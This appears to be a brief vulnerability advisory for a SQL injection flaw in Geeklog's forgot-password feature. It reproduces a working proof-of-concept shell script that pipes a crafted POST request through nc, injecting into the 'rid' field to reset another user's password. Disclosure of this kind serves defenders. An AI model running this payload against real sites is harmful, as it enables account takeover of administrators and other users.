|
Geeklog Forgot Password SQL Injection Vulnerability
This issue may be exploited with a web browser. The following example was provided: ------------->8------------->8------------->8------------->8-------------- #!/bin/sh echo "POST /path/to/gl/users.php HTTP/1.0 Content-length: 50 Content-type: application/x-www-form-urlencoded mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1& " | nc localhost 80 ------------->8------------->8------------->8------------->8-------------- |
|
|
Privacy Statement |
